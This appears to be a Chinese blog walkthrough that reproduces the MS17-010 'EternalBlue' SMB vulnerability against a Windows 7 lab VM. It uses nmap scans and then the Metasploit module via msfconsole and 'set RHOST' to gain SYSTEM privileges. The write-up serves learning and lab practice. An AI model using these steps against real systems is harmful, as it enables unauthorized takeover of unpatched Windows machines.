MS17-010复现

MS17-010即“永恒之蓝”漏洞,利用Windows系统的SMB漏洞可以获取系统最高权限。本文对此漏洞进行复现。

一、准备阶段

首先靶机采用 win7 sp1 x64 版本 镜像链接:

https://pan.baidu.com/s/1UTImMhW_1p3t4ElA5s1_VQ

提取码:sv0j

ip信息:

使用kali进行攻击

二、漏洞检测

使用nmap进行扫描,两台虚拟机在同一网段,使用命令:nmap -sn 192.168.31.0/24

 

使用命令:nmap -O 192.168.31.128,查看是否开放了445端口

 三、进行攻击

使用命令:msfconsole打开MSF命令台,出现msf6 > 的命令行即为成功

使用命令:search 17-010搜索,选择下面这个攻击模块

 之后查看options,填入yes标签的参数,我只有rhost需要填

填入命令 set RHOST 192.168.31.128(ip为win7的IP) 

润一下,出现以下字样即为攻击成功

 之后输入ipconfig,结果为win7的信息:

输入getuid为system权限

 

攻击成功!!!!!

 

  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值